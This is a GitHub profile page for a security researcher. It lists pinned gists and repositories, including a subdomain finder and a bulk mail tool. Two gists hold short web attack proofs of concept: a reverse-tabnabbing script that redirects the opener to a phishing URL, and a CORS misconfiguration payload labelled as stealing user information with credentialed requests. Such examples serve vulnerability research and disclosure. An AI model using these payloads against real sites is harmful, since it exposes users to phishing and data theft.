Skip to content
View devhug's full-sized avatar
  • NY

Organizations

@RepublicR0K @iosanalyzer @huggerctf @androidanalyzer
Block or Report

Block or report devhug

Block user

Prevent this user from interacting with your repositories and sending you notifications. Learn more about blocking users.

You must be logged in to block users.

Please don't include any personal information such as legal names or email addresses. Maximum 100 characters, markdown supported. This note will be visible to only you.
Report abuse

Contact GitHub support about this user’s behavior. Learn more about reporting abuse.

Report abuse

Pinned Loading

  1. Reverse Tabnabbing Web Attack | OWAS... Reverse Tabnabbing Web Attack | OWASP Foundation
    1
    <script>
    2
    if (window.opener) window.opener.parent.location.replace('http://phishing.com');
    3
    if (window.parent != window) window.parent.location.replace('http://phishing.com');
    4
    </script>
  2. Cross-origin resource sharing miscon... Cross-origin resource sharing misconfig | steal user information
    1
    <html>
    2
    <script>
    3
    var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://redacted.com/api/users/number',true); req.withCredentials = true; req.send('{}'); function reqListener() { alert(this.responseText); };
    4
    </script>
    5
    </html>
  3. sender sender Public

    Open source sender (OSS) - Sender inbox all office365

    Python 2 3

  4. subhug subhug Public

    Subdomains online tool to discover subdomains of a target domain.

    Shell

  5. google/leveldb google/leveldb Public

    LevelDB is a fast key-value storage library written at Google that provides an ordered mapping from string keys to string values.

    C++ 35.8k 7.7k